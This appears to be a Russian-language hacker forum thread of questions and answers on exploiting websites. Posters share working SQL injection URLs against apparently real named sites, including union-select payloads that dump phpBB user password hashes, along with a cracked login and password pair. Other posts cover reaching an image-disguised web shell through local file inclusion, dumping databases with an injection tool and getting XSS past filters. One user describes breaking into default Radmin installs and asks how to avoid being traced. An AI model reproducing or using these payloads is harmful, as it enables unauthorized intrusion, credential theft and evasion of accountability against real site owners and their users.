Ваши вопросы по уязвимостям.

http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6,7+from+phpbb_users--+

 

Подскажите плиз можно ли провести SQL-inj
Строка вида site.ru/?cat=menu'
Если оборсать строка menu'--+ то не ошибки не инфы не выводит...
А вот если menu'+ То инфа выводится как при нормальном запросе

 

Идет слеширование кавычек а без них запрос не завершит, ищи числовые данные в передоваемых скрипту значениях, зачастую они идут в запрос без кавычек, и как правило где есть одна скуля на одном сайте есть и другие.

для админов можно и так

http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,group_concat(concat_ws(0x3a,username,user_password)+separator+'<br>'),4,5,6,7+from+phpbb_users+where+user_level=1--+

 

local include

залил шелл как картинку вида image.php.gif на сервер, почитал статьи понял что надо теперь проинклудить, нашел лосал инклуд вида:

Warning: include_once() [function.include]: Failed opening 'CLASS_FILE' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/webdev/public_html/......../class.search.php on line 2
Warning: require_once(CLASS_SESSION_ACTION) [function.require-once]
Warning: include_once(CLASS_FILE) [function.include-once]
Fatal error: require_once() [function.require]

как мне используя это запустить шелл? в примерах описал локал инклуд вида .php?id=ит.д. а у меня просто /class.search.php

 

да я тоже прочитал и при таком раскладе выходит это
oxana:c4ca4238a0b923820dcc509a6f75849b
administrator:30f46374c898450c560f8c14999b7ff7-
что это означает первая часть логин а второе как расшифровать

 

2AET - начни что то читать, а то это не дело так, если учесть что ты еще шелл захочешь залить то тут твоих вопросов будет на 10 страниц, это md5
oxana:c4ca4238a0b923820dcc509a6f75849b - 1
то есть логин - oxana пароль 1

 

Вторая - это md5 хеш того, что находится в колонке user_password
для расшифровки есть много сервисов, или же самостоятельно брутить с помощью скажем пассворд рековер..

 

вот полный путь: http://www.anh.gov.co/scripts/tiny_mce/plugins/ajaxfilemanager/inc/class.search.php

 

Люди help plz. Я кароч насканил кучу ip нашол дефлотные радминов. и без проксей
подрубился и начал пакостить
1) У радмина v2 or v2.1 есть log где айпишники подрубившихся?
2)если я подключился к дефлотному радмину - это наказуемо (преступление)?
3)Радмин v2 or v2.1 ведёт лог что с токогото ip была запушена какянит прога?
4)Я сижу под NAT'ом с динамичким ip. ADSL
меня могут вычислить?

 

Всем привет.! Вопрос такой:
Юзаю SIPT 4.0
Все настроил и он оперделил принт поля.
Надо задампить бд... но как? //как настроить прогу
Нада вот так
http://......../i.php?id=.......+limit+0,1
http://......../i.php?id=.......+limit+1,1
.........................................................
Руками я не могу делать - много записей.

 

da
da
net
da

 

Если 4-ая ветка - table brutforce, потом поля.
Если 5-ая ветка - Get Names From Information_Schema

Чтобы инфу с таблицы тащить:

1. Ставишь галочку на нужных колонках.
2. Выбираешь кол-во записей, которое хочешь вытащить - For MySql From 0 to 1000
3. Нажимаешь Get Data

 

накатай скрипт для сбора записей)

 

что можно сделать с этим...
http://imhognito.net/promo.php?t=ub+union+select+1111111,22222222,33333333,44444444444/*&id=2edf0816d583290eb819f1b4cd946244
?

 

Вот здесь вот интересная ситуация

http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=13'

 

id фильтруется вроде как, а вот как ты юнино подбирал не пойму "t=ub" это помоему просто кейс не относящийся к запросу )

 

вопрос но XSS
немогу суть уловить. Вот говорят мол если фильтруються некоторые символы, то можно ппробывать использовать их десятичные или 16-ные коды.
Я понимаю что пожно для поссивных XSS, в браузерной строке вместо " вбить %22 и оно сработает как кавычка. А при активных ? при замене " на &#34 или " нехрена непомогает, притом <тег> ... </тег> должны быть 100% написаны в авном виде без кодов., да и если в нуть скрипта пихнуть че, например alert заменить на его коды то нехрена оно несработает.
Где я неправ ??? поправте.

 

И чем она интересна ?

 

а ты попробуй поля подобрать и увидешь )

 

А чо тут подбирать-то:

Code:

http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+order+by+1

Но видать запрос сложный, участвует ни одна таблица только, но скуля есть, хоть и блайнд:

Code:

http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+or+1=0

http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+or+1=1

4-ая ветка:

Code:

http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=13+and+substring(version(),1,1)=4